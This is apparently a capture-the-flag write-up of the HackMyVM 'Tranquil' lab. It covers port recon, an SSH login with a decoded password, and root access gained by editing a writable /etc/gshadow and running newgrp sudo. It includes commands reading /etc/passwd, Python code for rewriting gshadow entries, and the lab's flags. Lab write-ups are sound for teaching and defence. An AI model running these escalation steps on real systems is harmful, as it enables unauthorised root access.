
[HMV] Tranquil

0x00 Setup

Attacker IP: 172.16.1.25

Target IP: 172.16.1.88

0x01 Attack

Scan the target for open ports with Nmap

┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.88
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 13:56 CST
Nmap scan report for 172.16.1.88
Host is up (0.00044s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
|_ftp-bounce: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey: 
|   3072 0e033b7800291dba60860ed3bb7e3c04 (RSA)
|   256 2a474d9cce0761caf0ca588b5b0fd4db (ECDSA)
|_  256 6c4250a560e90f370fbeecd12074299c (ED25519)
MAC Address: 08:00:27:F4:24:B0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.37 seconds

Only one port, 21, is open. The odd part is that Nmap's version detection identifies the service on it as OpenSSH rather than FTP, and there is no HTTP at all; the ftp-bounce script only ran because 21 is FTP's default port, and it failed. Unusual. Re-run with -d to see why the script failed.

[screenshot: nmap -d output for port 21]

The debug output shows there is no FTP service on port 21 at all; everything that comes back is the OpenSSH banner. Try curl next.

┌──(root㉿Kali-VM)-[~/work]
└─# curl 172.16.1.88:21 
<img src="tranquil.jpg">


<!-- We are one, humans, computers and ports.
- guru -->

curl actually got HTML back, so there is also a web page served on port 21. Whatever listens there answers as SSH to a client that stays silent and as HTTP to a client that sends a request first; that is how a protocol demultiplexer such as sslh behaves, although the actual server on the box is never identified. Quite a trick. Open the page in a browser.
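To show why one port answers as SSH to nmap and as HTTP to curl, here is a minimal sslh-style demultiplexer together with the two probes, as an added example; it is not the box's configuration and not code from the original writeup. The SSH banner, the HTML body and the 0.5 s peek timeout are constructed to mimic what the scan and curl returned, and the real server on 172.16.1.88:21 is not identified anywhere on the page.

```python
"""sslh-style demultiplexer: SSH and HTTP on one TCP port (added example)."""
import socket
import threading

SSH_BANNER = b"SSH-2.0-OpenSSH_8.4p1 Debian-5\r\n"   # constructed, mirrors nmap's version string
HTML_BODY = b'<img src="tranquil.jpg">\n'            # constructed, mirrors the curl output
PEEK_TIMEOUT = 0.5   # how long the mux waits for the client to speak first (assumed value)


def classify(first_bytes):
    """Decide the protocol from the first bytes a client sends."""
    if first_bytes.startswith(b"SSH-"):
        return "ssh"
    if first_bytes[:1] == b"\x16":          # TLS record type 0x16 = handshake
        return "tls"
    method = first_bytes.split(b" ", 1)[0]
    if method in (b"GET", b"HEAD", b"POST", b"PUT", b"DELETE", b"OPTIONS"):
        return "http"
    return "unknown"


def handle(conn):
    """Serve one accepted connection according to what the client does first."""
    conn.settimeout(PEEK_TIMEOUT)
    try:
        first = conn.recv(1024, socket.MSG_PEEK)   # look without consuming
    except socket.timeout:
        first = b""
    # A silent client is treated as SSH: in SSH the server sends its
    # identification string first, so nmap's ssh scripts and an SSH client
    # both see OpenSSH, while curl (which talks first) gets HTTP.
    proto = classify(first) if first else "ssh"
    try:
        if proto == "http":
            conn.recv(65536)   # consume the request; a real mux would proxy it
            head = (b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n"
                    b"Content-Length: %d\r\n\r\n" % len(HTML_BODY))
            conn.sendall(head + HTML_BODY)
        else:
            conn.sendall(SSH_BANNER)   # a real mux would hand the socket to sshd
    finally:
        conn.close()


def start_mux(host="127.0.0.1", port=0):
    """Start the demultiplexer in a background thread; returns (socket, bound port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(8)

    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:   # listening socket closed
                return
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def _read_all(sock, timeout=3.0):
    """Read until the peer closes or the timeout hits."""
    sock.settimeout(timeout)
    chunks = []
    while True:
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        chunks.append(chunk)
    return b"".join(chunks)


def probe(host, port):
    """Two probes against the same port: stay silent (like nmap's ssh scripts
    or an SSH client), then send an HTTP request first (like curl)."""
    with socket.create_connection((host, port), timeout=3) as s:
        silent = _read_all(s)
    with socket.create_connection((host, port), timeout=3) as s:
        s.sendall(b"GET / HTTP/1.0\r\nHost: %s\r\n\r\n" % host.encode())
        spoken = _read_all(s)
    return {"silent_connect": silent, "http_request": spoken}


if __name__ == "__main__":
    srv, port = start_mux()
    for name, reply in probe("127.0.0.1", port).items():
        print("%s: %r" % (name, reply[:40]))
    srv.close()
```

The silent probe is also the quickest manual check for this kind of port: `nc host 21` and wait a second; if a banner arrives unprompted it is a server-speaks-first protocol such as SSH, and only then send `GET / HTTP/1.0` on a fresh connection.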

[screenshot: browser error when opening 172.16.1.88:21]

Hmm... Chrome and Edge both refuse to load it: port 21 is on the browsers' restricted-port list (ERR_UNSAFE_PORT) and plain HTTP to it is blocked by default. Firefox can lift the restriction by adding 21 to network.security.ports.banned.override in about:config.

[screenshot: the page rendered in Firefox]

The page shows a grid of small coloured squares. This is Hexahue, an encoding that maps each character to a 2x3 block of six colours; decoding it gives KEEPCALM

[screenshot: Hexahue decoding result, KEEPCALM]

Try the "guru" from the HTML comment as the username and "KEEPCALM" as the password, over SSH on port 21

[C:\~]$ ssh guru@172.16.1.88 21


Connecting to 172.16.1.88:21...
Connection established.
To escape to local shell, press Ctrl+Alt+].

Linux tranquil 5.10.0-8-686-pae #1 SMP Debian 5.10.46-5 (2021-09-23) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Sep 30 09:04:21 2021 from 192.168.1.51
guru@tranquil:~$

Shell obtained. List the users that have a login shell

guru@tranquil:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
guru:x:1000:1000:guru,,,:/home/guru:/bin/bash

Only two such users, so the route is a direct escalation from guru to root. Grab user.txt first

guru@tranquil:~$ ls -al ~
total 32
drwxr-xr-x 3 guru guru 4096 Mar 15 02:17 .
drwxr-xr-x 3 root root 4096 Sep 30  2021 ..
-rw-r--r-- 1 guru guru  220 Sep 30  2021 .bash_logout
-rw-r--r-- 1 guru guru 3526 Sep 30  2021 .bashrc
drwxr-xr-x 3 guru guru 4096 Sep 30  2021 .local
-rw-r--r-- 1 guru guru  807 Sep 30  2021 .profile
-rw------- 1 guru guru   16 Sep 30  2021 user.txt
-rw------- 1 guru guru   54 Mar 15 02:17 .Xauthority

guru@tranquil:~$ cat ~/user.txt 
HMVbecauseweare

Start looking for a privilege-escalation route. First, the SUID binaries

guru@tranquil:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/chfn
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

guru@tranquil:~$ sudo -l
[sudo] password for guru: 
Sorry, user guru may not run sudo on tranquil.
guru@tranquil:~$

Nothing beyond the stock Debian SUID set, and guru cannot run sudo. Next, look for files guru can write to, skipping the pseudo-filesystems

guru@tranquil:~$ find / -writable ! -path '/proc*' ! -path '/run*' ! -path '/sys*' ! -path '/dev*' -type f 2>/dev/null
/etc/gshadow
/home/guru/.profile
/home/guru/.bash_history
/home/guru/.bash_logout
/home/guru/user.txt
/home/guru/.bashrc
/home/guru/.Xauthority
/home/guru/.wget-hsts

/etc/gshadow is writable, which an unprivileged user should never have (Debian ships it as root:shadow, mode 0640). Like /etc/shadow, which holds user password hashes, /etc/gshadow holds group password hashes, one line per group in the format group:password:administrators:members. A group whose password field holds a hash can be joined with newgrp by any user who knows that password; newgrp then starts a new shell whose primary group is that group. So: generate a hash, write it into the password field of the sudo line (that is what the nano step below does), and newgrp into sudo; sudo's %sudo rule in sudoers will then match guru's session.

guru@tranquil:~$ openssl passwd -1 Qwer1234
$1$PP5ztOQV$POPQfv/HSlt61n/oZTJwx.

guru@tranquil:~$ nano /etc/gshadow

guru@tranquil:~$ newgrp sudo
Password: 

guru@tranquil:~$ sudo -l
[sudo] password for guru: 
Matching Defaults entries for guru on tranquil:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User guru may run the following commands on tranquil:
    (ALL : ALL) ALL
    
guru@tranquil:~$ sudo su

root@tranquil:/home/guru#

That's root. Note that sudo still asked for guru's own password (KEEPCALM); what newgrp changed is only the session's primary group, and that alone is what makes the %sudo rule match. Finally, root.txt

root@tranquil:/home/guru# ls -al ~
total 24
drwx------  3 root root 4096 Sep 30  2021 .
drwxr-xr-x 18 root root 4096 Sep 30  2021 ..
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
drwxr-xr-x  3 root root 4096 Sep 30  2021 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-------  1 root root   15 Sep 30  2021 root.txt

root@tranquil:/home/guru# cat ~/root.txt 
HMVyourfriends
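The gshadow edit from the escalation step, replayed on a scratch copy and paired with the check a defender would run against the real file, as an added example that is not part of the original writeup. The sample gshadow contents, the scratch file and the expected-mode table are constructed for this example (the modes are Debian's defaults); the hash is the one produced by `openssl passwd -1 Qwer1234` above.

```python
"""Edit a gshadow-format file and audit account databases (added example)."""
import os
import stat
import tempfile
from pathlib import Path

# gshadow line format: group:password:administrators:members
# "!" or "*" in the password field means password-based newgrp is disabled.


def parse_gshadow(text):
    """Split gshadow text into [group, password, admins, members] rows."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 4:
            raise ValueError("malformed gshadow line: %r" % line)
        rows.append(fields)
    return rows


def render_gshadow(rows):
    return "".join(":".join(r) + "\n" for r in rows)


def set_group_password(path, group, crypt_hash):
    """Set the password field of `group`, which is what the nano step did by hand.
    Only that field changes; every other line and field is preserved.
    `crypt_hash` is the output of `openssl passwd -1 <pw>` (MD5-crypt) or
    `openssl passwd -6 <pw>` (SHA-512-crypt). Returns True if the group existed."""
    p = Path(path)
    rows = parse_gshadow(p.read_text())
    hit = [r for r in rows if r[0] == group]
    for r in hit:
        r[1] = crypt_hash
    if hit:
        p.write_text(render_gshadow(rows))
    return bool(hit)


def group_password_field(path, group):
    for r in parse_gshadow(Path(path).read_text()):
        if r[0] == group:
            return r[1]
    return None


# Expected modes of the account databases on Debian (owner root for all,
# group shadow for shadow/gshadow). Used by the defender-side audit.
EXPECTED_MODE = {
    "/etc/passwd": 0o644,
    "/etc/group": 0o644,
    "/etc/shadow": 0o640,
    "/etc/gshadow": 0o640,
    "/etc/sudoers": 0o440,
}


def audit_account_files(paths, expected=EXPECTED_MODE):
    """Return (path, problem) pairs: files the current user could write, which
    is what `find / -writable` surfaced on the box, plus files whose mode grants
    more than `expected`. Paths that do not exist are skipped."""
    findings = []
    for path in paths:
        if not os.path.exists(path):
            continue
        if os.access(path, os.W_OK):
            findings.append((path, "writable by current user"))
        mode = stat.S_IMODE(os.stat(path).st_mode)
        want = expected.get(path)
        if want is not None and mode & ~want:
            findings.append((path, "mode %04o looser than %04o" % (mode, want)))
    return findings


def demo():
    """Replay the gshadow step on a scratch copy (constructed contents), then
    audit that copy the way a defender would audit /etc/gshadow."""
    with tempfile.NamedTemporaryFile("w", suffix=".gshadow", delete=False) as f:
        f.write("root:*::\nsudo:!::\nguru:!::\n")
        scratch = f.name
    try:
        os.chmod(scratch, 0o666)   # deliberately too loose, like the box
        set_group_password(scratch, "sudo", "$1$PP5ztOQV$POPQfv/HSlt61n/oZTJwx.")
        return {
            "gshadow_after": Path(scratch).read_text(),
            "audit": [problem for _, problem in
                      audit_account_files([scratch], expected={scratch: 0o640})],
        }
    finally:
        os.unlink(scratch)


if __name__ == "__main__":
    result = demo()
    print(result["gshadow_after"], end="")
    print(result["audit"])
    for path, problem in audit_account_files(EXPECTED_MODE):   # the real files
        print("%s: %s" % (path, problem))
```

Running the audit as an unprivileged user on the box would flag /etc/gshadow as writable, which is the whole vulnerability; run as root, the writable check is meaningless (root can write anything) and only the mode comparison carries information.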

0x02 Summary

Running SSH and HTTP on port 21 at the same time is quite a trick. The actual flaw, though, is a writable /etc/gshadow: any file that feeds authentication or authorization (passwd, shadow, group, gshadow, sudoers) being writable by an unprivileged user is a direct path to root, and the fix is to restore root:shadow with mode 0640 on it.

posted @ 2023-03-20 10:59 by 20206675